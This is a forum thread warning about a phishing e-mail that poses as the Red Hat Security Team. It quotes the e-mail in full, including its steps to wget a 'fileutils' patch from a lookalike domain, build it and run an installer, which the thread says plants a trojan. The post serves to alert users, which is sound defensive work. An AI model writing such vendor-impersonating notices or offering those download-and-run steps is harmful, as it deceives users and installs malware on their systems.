Thread: Phishing to install a trojan.

Phishing to install a trojan.

The Internet Storm Center has a story posted today about a fake e-mail which try's to convince the recipient to download and install a security patch on their Red Hat systems. The e-mail will look something like this:

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Security RedHat mirror:
    wget http://www.fedora-redhat.com/fileuti...6.patch.tar.gz
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.
    Internet Storm Center

Cheers:
    DjM

Just a Virtualized Geek MrLinus's Avatar
    Indeed. It was identified on FD over the weekend and doing a quick search on Google I found one site (Linux Times) had posted it but has since removed it. I guess few checked the SMTP source? (apparently it's from U of T in Arlington?)
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage